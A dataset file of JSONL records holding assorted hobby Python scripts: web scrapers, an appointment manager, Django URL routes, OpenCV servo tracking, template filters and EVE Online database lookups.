+{"seq_id":"7743571","text":"\"\"\"This module performs web scraping to obtain prices and characterestics\nof Azure virtual machines\"\"\"\n\nimport logging\nimport json\nfrom lxml import etree\nfrom io import StringIO\n\n\nclass AzurePrices:\n def __init__(self, filename):\n self.filename = filename\n self.log = logging.getLogger(__name__)\n self.log.info(\"Filename=%r\", filename)\n\n def parse_vm(self, node):\n \"\"\"Receives a xtree node from which all the data about a VM type can\n be extracted. This code is very fragile because it depends on the\n structure of the web page, which can be changed by Microsoft\"\"\"\n\n dic = {}\n # Get data about this VM type, which is two cells above\n cells = node.xpath(\"td\")\n\n # First four cells in the row contain hardware features\n cols = [\"Instance\", \"Cores\", \"RAM\", \"DISK\"]\n for i, c in enumerate(cells[:-1]):\n dic[cols[i]] = \" \".join([data.strip()\n for data in c.xpath(\".//text()\")\n ])\n # VM tier is more difficult. It is extracted from the last h3 title\n dic[\"Tier\"] = node.xpath(\"preceding::h3/text()\")[-1].strip()\n\n # Last cell is a , being xxx a JSON string\n # which contains prices and regions\n data_amount = cells[-1].xpath(\"./span/@data-amount\")[0]\n if not data_amount.startswith(\"{\"):\n return None\n price_data = json.loads(data_amount)\n # Default price for all regions\n if \"default\" in price_data:\n dic[\"default\"] = price_data[\"default\"]\n # Specific price for some regions\n for region, price in price_data[\"regional\"].items():\n dic[region] = float(price)\n return dic\n\n def scrape(self):\n with open(self.filename, \"r\") as f:\n r = f.read()\n parser = etree.HTMLParser()\n self.log.info(\"Scraping data from Azure web\")\n tree = etree.parse(StringIO(r), parser)\n data = []\n tiers = tree.xpath(\"//*[contains(@class, 'table-width-even')]\")\n for tier in tiers:\n vms = tier.xpath(\".//tr\")\n for vm in vms[1:]:\n data.append(self.parse_vm(vm))\n return json.dumps(data)\n\n def scrape_and_save(self, filename):\n self.log.info(\"About to scrap %s\", self.filename)\n data = self.scrape()\n self.log.info(\"About to save %s\", filename)\n with open(filename, \"w\") as f:\n f.write(data)\n\n\nif __name__ == \"__main__\":\n # For testing purpose only. This module is not intended\n # to be run from command line, but from Snakefile\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n df = AzurePrices(\"/tmp/azure-web.html\").scrape_azure()\n","sub_path":"src/data/azure_scrap.py","file_name":"azure_scrap.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"15145609","text":"from sys import exit\nimport oo_appointment_manager as apnt_mngr\n\ndo = apnt_mngr.Appointment(\"\", apnt_mngr.Duration(apnt_mngr.Time(\"\"), apnt_mngr.Time(\"\")))\n\nappointments_dict = {\n\t\t\"monday\"\t: [],\n\t\t\"tuesday\"\t: [],\n\t\t\"wednesday\" \t: [],\n\t\t\"thursday\"\t: [],\n\t\t\"friday\"\t: [],\n\t\t\"saturday\"\t: [],\n\t\t\"sunday\"\t: []\n}\n\ndays_index = {\"monday\":0, \"tuesday\":1, \"wednesday\":2, \"thursday\":3, \"friday\":4, \"saturday\":5, \"sunday\":6}\n\napps_from_file = do.get_appointments_from_file()\t\t\t# [['monday', ' 7:00-7:25']], len = 7\n\ndurations = [[], [], [], [], [], [], []]\t\t\t\t# List keeps track of Duration()'s.\n\n# This short block of code initializes appointments from the text file.\ni = 0\nfor day in apps_from_file:\t\t\t\t\t\t# day = ['monday', ' 7:00-7:25']\n\tday_ = day[0]\n\tfor duration in day:\n\t\tduration = duration.strip().split(\"-\")\n\t\tapnt_mngr.duration_and_appnt_init(duration, durations, i, day, appointments_dict)\n\ti += 1\n\nvalid_actions = [\"add\", \"remove\", \"all\", \"help\"]\n\ntry:\n\tuser_input = input(\">>> \")\n\twhile user_input != \"exit\":\n\n\t\tuser_input = user_input.lower().split(\" \")\n\n\t\tif user_input[0] in valid_actions or user_input[0] in appointments_dict:\n\t\t\taction = user_input[0]\n\t\t\tdo.sort_appointments(appointments_dict)\n\t\t\t\n\t\t\tif len(user_input) == 1:\n\t\t\t\tif action == \"all\":\n\t\t\t\t\tdo.print_all_appointments(appointments_dict)\n\t\t\t\telif action in appointments_dict:\n\t\t\t\t\tdo.print_certain_appointments(appointments_dict, action)\n\t\t\t\telif action == \"help\":\n\t\t\t\t\tprint(apnt_mngr.help_())\n\t\t\n\t\t\telse:\n\t\t\t\tuser_input = \" \".join(user_input[1:])\t# 'thursday, 15:00-16:00'\n\t\t\t\tuser_input = user_input.split(\",\")\t# ['thursday', ' 15:00-16:00']\n\t\t\t\n\t\t\t\t# This try: except block is needed to handle data that isn't in this format: ['day', 'duration']\n\t\t\t\ttry:\n\t\t\t\t\tuser_input = [user_input[0], user_input[1].strip().split(\"-\")[0], user_input[1].strip().split(\"-\")[1]]\t# ['thursday', ['15:00', '16:00']]\n\t\t\t\texcept IndexError:\n\t\t\t\t\tpass\n\n\t\t\t\t# Adding and removing appointments.\n\t\t\t\tif len(user_input) == 3:\n\t\t\t\t\ti = days_index[user_input[0]]\n\t\t\t\t\tif action == \"add\":\n\t\t\t\t\t\tapnt_mngr.duration_and_appnt_add(user_input, durations, appointments_dict, i)\n\t\t\t\t\telif action == \"remove\":\n\t\t\t\t\t\tapnt_mngr.duration_and_appnt_remove(user_input, durations, appointments_dict, i)\n\t\tprint()\n\t\tuser_input = input(\">>> \")\n\n\tdo.write_appointments_to_file(appointments_dict)\t\t# Update appointments in appointments.txt\n\nexcept KeyboardInterrupt:\n\tdo.write_appointments_to_file(appointments_dict)\n\tprint()\n","sub_path":"object_oriented_style/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"50090696","text":"# The sum of the squares of the first ten natural numbers is\n# 12 + 22 + ... + 102 = 385\n# The square of the sum of the first ten natural numbers is,\n# (1 + 2 + ... + 10)2 = 552 = 3025\n# Hence the difference between the sum of the squares of the \n# first ten natural numbers and the square of the sum is\n# 3025 - 385 = 2640.\n\n# Find the difference between the sum of the squares of the \n# first one hundred natural numbers and the square of the sum.\n\ntheSum = sum(range(1, 101))\nsqueareOfTheSum = theSum*theSum\n\nsumOfTheSquares = 0\nfor x in range(1, 101):\n sumOfTheSquares += x*x\n print(sumOfTheSquares)\n\ndifference = squeareOfTheSum - sumOfTheSquares\n\nprint(difference)\n","sub_path":"006.py","file_name":"006.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"58133723","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@__Create Time__ = 2018/1/25 下午3:50\n@__Description__ = \" \"\n\"\"\"\nfrom django.urls import path\nfrom .views import asset,outsider,group,asset_detail,group_detail\n\nurlpatterns = [\n path('list', asset.AssetListView.as_view(), name='asset_list'),\n path('create', asset.CreateAssetView.as_view(), name='create_asset'),\n path('activate/', asset.ActivateAssetView.as_view(), name='activate_asset'),\n path('delete/', asset.DeleteAssetView.as_view(), name='delete_asset'),\n path('edit/', asset.EditAssetView.as_view(), name='edit_asset'),\n path('export',outsider.ExportAssetView.as_view(),name='export'),\n path('import',outsider.ImportAssetView.as_view(),name='import'),\n\n path('/detail/addition/group',asset_detail.AssetDetailAdditionGroupView.as_view(),name='asset_detail_addition_group'),\n path('/detail/delete/group',asset_detail.AssetDetailDeleteGroupView.as_view(),name='asset_detail_delete_group'),\n path('/detail',asset_detail.AssetDetailView.as_view(),name='asset_detail'),\n\n path('asset-group/list',group.AssetGroupListView.as_view(),name='asset_group_list'),\n path('asset-group/create',group.CreateAssetGroupView.as_view(),name='create_asset_group'),\n path('asset-group/delete/',group.DeleteAssetGroupView.as_view(),name='delete_asset_group'),\n path('asset-group/edit/', group.EditAssetGroupView.as_view(), name='edit_asset_group'),\n path('asset-group//detail',group_detail.AssetGroupDetailView.as_view(),name='asset_group_detail'),\n path('asset-group//detail/addition/asset',group_detail.AssetGroupDetailAdditionAssetView.as_view(),\n name='asset_group_detail_addition_asset'),\n path('asset-group//detail/delete/asset',group_detail.AssetGroupDetailDeleteAssetView.as_view(),\n name='asset_group_detail_delete_asset'),\n]","sub_path":"asset/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"419418702","text":"#PanTilt code\n\nimport cv2\nimport numpy as np\nfrom picamera.array import PiRGBArray\nimport smbus\nimport time\nbus = smbus.SMBus(1)\n\naddress = 0x04 #for 12C with Arduino\n\ndef writeNumber(value):\n bus.write_byte(address,value)\n return -1\n\ndef readNumber():\n number = bus.read_byte(address)\n return number\n\nimageWidth = 320 # Camera image width\nimageHeight = 240 # Camera image height\n\ncamera = PiCamera()\ncamera.resolution = (imageWidth,imageHeight)\ncamera.framerate = 18\nframeCapture = PiRGBArray(camera,size = (imageWidth,imageHeight))\n\nfor frame in camera.capture_continuous(frameCapture,format = \"bgr\", use_video_port=True):\n\n image = frame.array\n\n #flip image to correct orientation\n image = cv2.flip(image,0)\n image = cv2.flip(image,1) #left-right\n\n #Blur - remove initial noise (low pass filter kernel)\n image = cv2.medianBlur(image,5)\n \n #convert to HSV image (basic thresholding)\n #Hue (0,179), Saturation (0,255), Value (0,255)\n hsv = cv2.cvtColor(image,cv2.COLOR_BGR2HSV) \n\n redLower = np.array([50,100,100]) \n redUpper = np.array([240,255,250])\n \n mask = cv2.inRange(hsv,redLower,redUpper)\n #result = cv2.bitwise_and(image,image,mask = mask)\n cv2.imshow(\"test\",mask)\n \n #Using contours for error calculation\n #each contour is a numpy array of (x,y) coordinates = boundary of a shape\n img,contours,hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n #Create bounding rectangle\n minArea = 200 #threshold (can modify later to get largest)\n c_max = 1\n #Setpoint\n sp_x = imageWidth/2 #160\n sp_y = imageHeight/2 #120\n \n for c in contours:\n CArea = cv2.contourArea(c)\n if CArea < minArea:\n continue\n x,y,w,h = cv2.boundingRect(c)\n #cv2.drawMarker(img,(sp_x,sp_y),(255,0,255),cv2.MARKER_CROSS,5,1) \n\n img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,255,0),2)\n cv2.imshow(\"test\",img)\n\n #Measured Centre of Box\n measured_x = x + w/2\n measured_y = y + h/2\n\n #print(\"image shape\",img.shape)\n #print(\"Image_X: \", sp_x)\n #print(\"Image_Y: \", sp_y)\n #print(\"BoxCentre_X: \", measured_x)\n #print(\"BoxCentre_Y: \", measured_y)\n \n #Error\n error_x = abs(sp_x - measured_x)\n error_y = abs(sp_y - measured_y)\n\n print(\"Error_x: \", error_x)\n print(\"Error_y: \", error_y)\n print(\"\\n\")\n \n #Command servo motors to turn on Arduino\n while ():\n var = input(\"Test\")\n\n writeNumber(var)\n print(\"Number sent was: \", var)\n time.sleep(1)\n number = readNumber()\n print(\"I received: \", number)\n\n #GUI stuff\n key = cv2.waitKey(5) & 0xFF\n\n frameCapture.truncate(0)\n\n if key == ord(\"q\"):\n break\n\n","sub_path":"pantilt.py","file_name":"pantilt.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"185022565","text":"import matplotlib.pyplot as plt\nfrom random_walk import RandomWalk\n\n\n# 只要程序处于活动状态,就不断的模拟随机漫步\nwhile True:\n rw = RandomWalk()\n rw.fill_walk()\n point_Numbers = list(range(rw.num_points))\n plt.scatter(rw.x_values, rw.y_values, edgecolors=None, c=point_Numbers, cmap=plt.cm.Blues, s=15)\n plt.show()\n\n\n keep_running = input(\"Make another walk? (y/n)\\n\")\n if keep_running == \"n\":\n break","sub_path":"python_work/第二部分/项目2 数据可视化/Chapter 15/15.3/rw_visual_v3.py","file_name":"rw_visual_v3.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"106333970","text":"import datetime\nimport random\nimport time\n\nimport requests\n\n\ndef request(request):\n response = requests.get(request)\n response.raise_for_status()\n return response\n\n\ndef params():\n with open(\"params_os.txt\", \"r\") as param_file:\n strings = [x.rstrip() for x in param_file.readlines() if x[0] != '#']\n params = []\n for i in strings:\n p = str.split(i, ',')\n d = {'fro': p[0], 'to': p[1], 'dt': p[2], 'adt': p[3], 'vend': p[4]}\n params.append(d)\n return params\n\n\ndef random_date(start):\n end = start + datetime.timedelta(days=180)\n delta = end - start\n random_day = random.randrange(delta.days)\n return start + datetime.timedelta(days=random_day)\n\n\ndef get_search_session(params):\n date = random_date(datetime.datetime.today())\n d1 = date.strftime(\"%Y-%m-%d\")\n d2 = random_date(date).strftime(\"%Y-%m-%d\")\n # dt = params['dt']\n if random.randint(0, 2) > 2:\n serq = 'http://yandexapi.dohop.com/api/v1/search/yandex/is/IS/%s/%s/%s?n_adults=%s&include_vendors=%s' % (\n params['fro'].upper(), params['to'].upper(), d1, params['adt'], params['vend'])\n else:\n serq = 'http://yandexapi.dohop.com/api/v1/search/yandex/is/IS/%s/%s/%s/%s?n_adults=%s&include_vendors=%s' % (\n params['fro'].upper(), params['to'].upper(), d1, d2, params['adt'], params['vend'])\n print(serq)\n serr = request(serq)\n serr.raise_for_status()\n return serr.json()['key']\n\n\ndef poll(session, continuation):\n pollq = 'http://yandexapi.dohop.com/api/v1/poll/%s/%s' % (session, continuation)\n pollr = request(pollq)\n pollr.raise_for_status()\n return pollr.json()\n\n\ndef get_fares(session):\n print('http://yandexapi.dohop.com/api/v1/poll/%s/0' % (session), '\\npolling ', end=\"\", flush=True)\n isdone = False\n continuation = 0\n while not isdone:\n print(continuation, end=\" \", flush=True)\n poll_response = poll(session, continuation)\n isdone = poll_response[\"is_done\"]\n continuation = poll_response[\"continuation\"]\n time.sleep(1)\n else:\n final_poll = poll(session, 0)\n if \"fares\" in final_poll.keys():\n print('')\n return final_poll\n else:\n print('done, no fares')\n return None\n\n # with open(\"output.json\",\"w\") as output:\n # \toutput.write(json.dumps(pollr.json(), sort_keys=True, indent=4, separators=(',', ': ')))\n # \tprint('done')\n\n\ndef print_links(session, vend, fares):\n for key, item in sorted(fares):\n link = 'http://edge.dohop.com/yandex/ru/?session=%s&vendor=%s&fare=%s¤cy=%s' % (session, vend, key, 'EUR')\n print(key, vend, round(item['f'][vend]['f'], 2), item['f'][vend]['c'], link)\n\n\nparams = params()\nfor param in params:\n session = get_search_session(param)\n fares = get_fares(session)\n if fares is not None:\n print_links(session, param['vend'], fares['fares'].items())\n print('\\n')\n\n# http://api.dohop.com/transfer/v1/{key}/{fare-id}/{vendor-id}/{currency}\n# http://edge.dohop.com/yandex/ru/?session=0326e3facea54343a8f53ce4156d77f2&vendor=934&fare=0¤cy=RUB\n","sub_path":"vendor_check/get_transfer.py","file_name":"get_transfer.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"143319028","text":"# -*- coding: utf-8 -*-\nfrom google.appengine.ext import webapp\n\n# get template register\nregister = webapp.template.create_template_register()\n\nDEBUG = True\n\ndef bbcode_content(value):\n \"\"\"\n Ref. http://code.djangoproject.com/wiki/CookBookTemplateFilterBBCode\n \"\"\"\n import re\n\n pat = re.compile(r'<([^>]*?)>', re.DOTALL | re.M)\n value = re.sub(pat, '<\\\\1>', value)\n\n bbdata = [\n (r'\\[url\\](.+?)\\[/url\\]', r'\\1'),\n (r'\\[url=(.+?)\\](.+?)\\[/url\\]', r'\\2'),\n (r'\\[email\\](.+?)\\[/email\\]', r'\\1'),\n (r'\\[email=(.+?)\\](.+?)\\[/email\\]', r'\\2'),\n (r'\\[img\\](.+?)\\[/img\\]', r''),\n (r'\\[img=(.+?)\\](.+?)\\[/img\\]', r'\"\\2\"'),\n (r'\\[b\\](.+?)\\[/b\\]', r'\\1'),\n (r'\\[i\\](.+?)\\[/i\\]', r'\\1'),\n (r'\\[u\\](.+?)\\[/u\\]', r'\\1'),\n (r'\\[quote\\](.+?)\\[/quote\\]', r'
    \\1
    '),\n (r'\\[center\\](.+?)\\[/center\\]', r'
    \\1
    '),\n (r'\\[code\\]\\s?(.+?)\\[/code\\]', r'
    \\1
    '),\n (r'\\[big\\](.+?)\\[/big\\]', r'\\1'),\n (r'\\[small\\](.+?)\\[/small\\]', r'\\1'),\n (u'\\\\n', r'
    '),\n ]\n\n for bbset in bbdata:\n p = re.compile(bbset[0], re.DOTALL)\n value = p.sub(bbset[1], value)\n\n #The following two code parts handle the more complex list statements\n temp = ''\n p = re.compile(r'\\[list\\](.+?)\\[/list\\]', re.DOTALL)\n m = p.search(value)\n if m:\n items = re.split(re.escape('[*]'), m.group(1))\n for i in items[1:]:\n temp = temp + '
  • ' + i + '
  • '\n value = p.sub(r'
      ' + temp + '
    ', value)\n\n temp = ''\n p = re.compile(r'\\[list=(.)\\](.+?)\\[/list\\]', re.DOTALL)\n m = p.search(value)\n if m:\n items = re.split(re.escape('[*]'), m.group(2))\n for i in items[1:]:\n temp = temp + '
  • ' + i + '
  • '\n value = p.sub(r'
      ' + temp + '
    ', value)\n\n return value\n\nregister.filter(bbcode_content)\n\ndef bbcode(value):\n from tools.templatetags.bbcode import render_bbcode\n return render_bbcode(value)\nbbcode.is_save = True\n\ndef strip_bbcode(value):\n from tools.templatetags.bbcode import strip_bbcode\n return strip_bbcode(value)\nbbcode.is_save = True\n\nfrom datetime import tzinfo, timedelta\nclass TaiwanTimeZone(tzinfo):\n '''CST'''\n ZERO = timedelta(0)\n PLUS_2 = timedelta(minutes = 3 * 60)\n def utcoffset(self, dt):\n return self.PLUS_2\n\n def tzname(self, dt):\n return \"CST\"\n\n def dst(self, dt):\n return self.ZERO\n\ndef twtz(value):\n #from datetime import timedelta\n return (value + timedelta(hours = 3)).replace(tzinfo = TaiwanTimeZone())\n\nfrom tools.templatetags.smiles import smile_filter\nfrom tools.templatetags.mail_filter import mail_filter, mail_filter_table\nfrom tools.templatetags.bbcode_filter import bbcode_filter\nfrom tools.templatetags.foto_filter import fotofilterm, fotofilterm2, fotofilterpc, fotofilterpc2\nfrom tools.templatetags.user_filter import userfilter2, userfilter, userfilter3, userfilter4\n\nregister.filter(twtz)\nregister.filter(bbcode)\nregister.filter(strip_bbcode)\nregister.filter(smile_filter)\nregister.filter(bbcode_filter)\nregister.filter(mail_filter)\nregister.filter(mail_filter_table)\nregister.filter(fotofilterpc)\nregister.filter(fotofilterpc2)\nregister.filter(fotofilterm)\nregister.filter(fotofilterm2)\nregister.filter(userfilter)\nregister.filter(userfilter2)\nregister.filter(userfilter3)\nregister.filter(userfilter4)\n","sub_path":"templatefilters.py","file_name":"templatefilters.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"423679354","text":"from sys import argv\n\n#Looks up and returns a ship name from an ID\ndef shiplookup(argv):\n import mysql.connector as mariadb\n shiptype = argv\n dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select typeName from invTypes where typeID=%s\", (shiptype,))\n shipname=dbref.fetchone()[0]\n dbopen.close()\n return shipname\n\n#Looks up and returns a solar system name from ID\ndef systemlookup(argv):\n import mysql.connector as mariadb\n solarid = argv\n dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select solarSystemName from mapSolarSystems where solarSystemID=%s\", (solarid,))\n systemname=dbref.fetchone()[0]\n dbopen.close()\n return systemname\n\n#Looks up and returns the security level of a system from the ID\ndef systemseclookup(argv):\n import mysql.connector as mariadb\n solarid = argv\n dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select security from mapSolarSystems where solarSystemID=%s\", (solarid,))\n systemsec=dbref.fetchone()[0]\n dbopen.close()\n return systemsec\n\n#Looks up and returns the region a system is in from a system ID\ndef regionlookup(argv):\n import mysql.connector as mariadb\n solarid = argv\n dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select regionID from mapSolarSystems where solarSystemID=%s\", (solarid,))\n regionid=dbref.fetchone()[0]\n dbref.execute(\"select regionName from mapRegions where regionID=%s\", (regionid,))\n regionname=dbref.fetchone()[0]\n dbopen.close()\n return regionname\n\n#Looks up character name from ID, first by seeing if it exists in the database, then ESI call to CCP servers\ndef characterlookup(argv):\n import mysql.connector as mariadb\n charid = argv\n dbopen = mariadb.connect(user='', database='abyssal', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select charactername from kills where characterid=%s\", (charid,))\n if (dbref.rowcount is not 0):\n charname=dbref.fetchone()[0]\n dbopen.close()\n return charname\n if (dbref.rowcount is 0):\n import json\n import urllib2\n charid = str(charid)\n url = \"https://esi.evetech.net/latest/characters/\"+ charid +\"/?datasource=tranquility\"\n response = urllib2.urlopen(url)\n data = response.read()\n chardata = json.loads(data)\n charname = chardata['name']\n dbopen.close()\n return charname\n\ndef groupidlookup(argv):\n import mysql.connector as mariadb\n shiptype = argv\n dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select groupID from invTypes where typeID=%s\", (shiptype,))\n groupid=dbref.fetchone()[0]\n dbopen.close()\n return groupid\n\n#Looks up system ID from zkill locationID\ndef locationidlookup(argv):\n import mysql.connector as mariadb\n locid = argv\n dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n dbref = dbopen.cursor(buffered=True)\n dbref.execute(\"select solarSystemID from mapDenormalize where itemID=%s\", (locid,))\n solarid=dbref.fetchone()[0]\n return solarid\n","sub_path":"lookup.py","file_name":"lookup.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"650270963","text":"#!/usr/bin/python\n\n# docco-husky cannot parse CoffeeScript block comments so we have to manually\n# transform them to single line ones while preserving the tab space\n\nimport sys\nfrom os import walk\n\ndef isComment(line):\n return \"###\" in line\n\ndef main(argv):\n path = argv[0]\n for (path, dirs, files) in walk(path):\n for filename in files:\n data = \"\"\n inBlock = False\n for line in open(path + '/' + filename, 'r'):\n if isComment(line):\n inBlock = not inBlock\n else:\n if inBlock:\n if line.strip():\n start = len(line) - len(line.lstrip())\n line = line[:start] + \"# \" + line[start:]\n data += line\n else:\n data += line\n open(path + '/' + filename, 'w').writelines(data)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"generate-documentation.py","file_name":"generate-documentation.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"4375363","text":"import vk\nimport time\nimport datetime\nimport json\nimport params\nimport threading\nimport math\nfrom queue import Queue\n\nsession = vk.Session(access_token= params.token_1)\napi = vk.API(session)\n\n\nclass soc_activity():\n\n result = list()\n list_instagrams = list()\n\n def __init__(self):\n pass\n\n#функция, которая возвращает список id пользователей состоящих в указанном сообществе\n\n def get_ids_from_community(self, id):\n count_users = 0\n end_circle = 0\n list_ids = []\n\n while(end_circle <= count_users):\n get_user_com, offset = api.execute(code=params.for_ids_from_comm%(str(end_circle),str(id)))\n\n end_circle = offset\n count_users = get_user_com[0]['count']\n\n for length in range(len(get_user_com)):\n list_ids.append(get_user_com[length]['ids'])\n\n time.sleep(0.3)\n\n return list_ids\n\n\n def count_need(self, list_with, string_target):\n var_count = 0\n\n for iter_list in list_with:\n for iter_dict in iter_list[string_target]:\n if iter_dict is not None:\n var_count = var_count + iter_dict\n\n return var_count\n\n\n#функция - проверка на то, есть ли этот человек в нужном нам сообществе\n def community_inspection(self, id, community):\n get_user_com, offset = api.execute(code=params.for_getting_com%str(id))\n\n list_id_and_names = list()\n list_id = list()\n list_names = list()\n\n for dicts_in in get_user_com:\n for ids in dicts_in['ids']:\n list_id.append(ids)\n for names in dicts_in['name']:\n list_names.append(names)\n\n for id_community in community:\n for id_from_list in range(len(list_id)):\n if int(list_id[id_from_list]) == int(id_community):\n dict_with_id_name = {}\n dict_with_id_name['id'] = list_id[id_from_list]\n dict_with_id_name['community_name'] = list_names[id_from_list]\n list_id_and_names.append(dict_with_id_name)\n\n return list_id_and_names\n#ищет пост на стене с самой близкой к заданной дате\n def searching_date(self, get_wall, date):\n min = int(date)\n id_in_dict = 0\n num_dict = 0\n\n for dicts in range(len(get_wall)):\n for values in range(len(get_wall[dicts]['dates'])):\n if get_wall[dicts]['dates'][values] is not None:\n if (math.fabs(int(date) - int(get_wall[dicts]['dates'][values])) <= min):\n min = math.fabs(int(date) - int(get_wall[dicts]['dates'][values]))\n id_in_dict = values\n num_dict = dicts\n\n offset = (num_dict + 1) * 100 + id_in_dict\n return offset\n\n#чекает платформы, с которых были сделаны посты\n def check_platforms(self, get_wall):\n plat = list()\n print(len(get_wall))\n if len(get_wall) != 0:\n\n for i in get_wall[0]['platform']:\n if i is not None:\n if (i['type'] and i['type'] not in plat):\n plat.append(i['type'])\n if 'platform' in i:\n if i['platform'] not in plat:\n plat.append(i['platform'])\n if i['platform'] == 'Instagram' or 'url' in i:\n self.list_instagrams.append(i['url'])\n return plat\n\n\n def get_friend_info(self, list_id, community_id, token, date):\n print('hello')\n session = vk.Session(access_token = token)\n api = vk.API(session)\n\n\n for lists in list_id:\n for id in lists:\n print(token)\n get_info = api.users.get(user_ids=id, fields=\"photo_200\", v=5.53)\n\n time.sleep(0.3)\n\n if 'deactivated' in get_info[0]:\n continue\n else:\n get_wall, offset = api.execute(code=params.getting_wall%str(id))\n\n offset = self.searching_date(get_wall, date)\n\n time.sleep(0.3)\n\n get_wall = api.execute(code=params.res_wall%(offset,str(id)))\n\n platforms = self.check_platforms(get_wall)\n\n time.sleep(0.3)\n\n count_like, count_repost = self.count_need(get_wall, 'likes'), self.count_need(get_wall, 'reposts')\n\n com_inspect = self.community_inspection(id, community_id)\n\n get_info[0]['community'] = com_inspect\n get_info[0]['likes'] = count_like\n get_info[0]['reposts'] = count_repost\n get_info[0]['post_count'] = offset\n get_info[0]['coefficient'] = int((count_repost+count_like)/offset)\n get_info[0]['platforms'] = platforms\n\n self.result.append(get_info[0])\n\n print(get_info)\n\n\n\n\n def get_result(self,friends,communities,data):\n\n try:\n #first_thread =\n threading._start_new_thread(target=self.get_friend_info,\n args=(friends[: int(len(friends) * 1 / 3)], communities, params.token_1, data))\n #second_thread =\n threading._start_new_thread(target=self.get_friend_info,\n args=(friends[int(len(friends) * 1 / 3): int(len(friends) * 2 / 3)], communities, params.token_2,data))\n #third_thread=\n threading._start_new_thread(target=self.get_friend_info,\n args=(friends[int(len(friends) * 2 / 3):], communities, params.token_3,data))\n\n\n except:\n print(\"Error: unable to start thread\")\n #first_thread.start()\n #second_thread.start()\n #third_thread.start()\n\n #first_thread.join()\n #second_thread.join()\n #third_thread.join()\n finally:\n users = {'users': self.result}\n users = json.dumps(users)\n\n return users\n\n\n\nsoc_activ = soc_activity()\nids = soc_activ.get_ids_from_community(66766496)\ndate = datetime.date(2016,4,14)\ndate = time.mktime(date.timetuple())\nsoc_activ.get_result(ids,[20629724, 98006063], date)\n\n\n\n\n\n","sub_path":"activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"423269670","text":"#prerna\n#reviewed by ashish\nimport re\nimport copy\nimport logging\nfrom urllib2 import urlparse\nfrom datetime import datetime, timedelta\n\nfrom tgimport import tg\nfrom baseconnector import BaseConnector\nfrom utils.utils import stripHtml, get_hash\nfrom utils.decorators import logit\nfrom utils.sessioninfomanager import checkSessionInfo, updateSessionInfo\n\nlog = logging.getLogger('GameTrailersConnector')\nclass GameTrailersConnector(BaseConnector):\n \n @logit(log , 'fetch')\n def fetch(self):\n '''This is a fetch method which fetches the data \n sample url: http://www.gametrailers.com/video/review-medal-of/25655\n '''\n try:\n self.genre = \"Review\"\n self.baseuri = 'http://www.gametrailers.com/ajax/player_comments_ajaxfuncs_read.php?do=get_list_page&type=movies&id=25655&page=1&count=10'\n #params = dict(type='movies',id=1000,page=100)\n #self.baseuri%params\n self.__task_elements_dict = {\n 'priority':self.task.priority,\n 'level': self.task.level,\n 'last_updated_time':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n 'pickup_date':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n 'connector_instance_log_id': self.task.connector_instance_log_id,\n 'connector_instance_id':self.task.connector_instance_id,\n 'workspace_id':self.task.workspace_id,\n 'client_id':self.task.client_id,\n 'client_name':self.task.client_name,\n 'versioned':False,\n 'category':self.task.instance_data.get('category',''),\n 'task_log_id':self.task.id }\n self.__setSoupForCurrentUri()\n self.__setParentPage()\n posts_url_id = 'movies&id=' + self.currenturi.split('/')[-1]\n self.currenturi = re.sub('movies&id=\\d+',posts_url_id,self.baseuri) \n self.__setSoupForCurrentUri()\n try:\n page_tag = int(stripHtml(self.soup.find('div','comment_head_text_right').\\\n findAll('a')[-2].renderContents()))\n log.debug(self.log_msg(page_tag))\n except:\n log.exception(self.log_msg('page_tag not found %s'%self.currenturi))\n count = 1\n while self.__iteratePosts():\n count += 1\n next_page = 'page=' + str(count)\n self.currenturi = re.sub('&page=\\d+&','&' + next_page + '&' ,self.currenturi)\n if count > page_tag: #for pagination\n break\n self.__setSoupForCurrentUri()\n except:\n 